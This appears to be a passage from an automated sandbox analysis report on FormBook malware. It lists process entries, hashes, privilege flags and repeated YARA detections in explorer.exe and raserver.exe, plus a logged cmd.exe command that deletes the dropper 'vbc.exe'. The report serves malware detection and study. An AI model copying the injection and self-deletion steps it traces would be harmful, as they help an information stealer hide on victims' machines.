                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            General

                                                            Start time:17:24:23
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0xffa10000
                                                            File size:3229696 bytes
                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:high

                                                            General

                                                            Start time:17:24:53
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\SysWOW64\raserver.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\raserver.exe
                                                            Imagebase:0x480000
                                                            File size:101888 bytes
                                                            MD5 hash:0842FB9AC27460E2B0107F6B3A872FD5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:moderate

                                                            General

                                                            Start time:17:24:55
                                                            Start date:25/11/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del "C:\Users\Public\vbc.exe"
                                                            Imagebase:0x4a120000
                                                            File size:302592 bytes
                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Disassembly

                                                            Code Analysis

                                                            Reset < >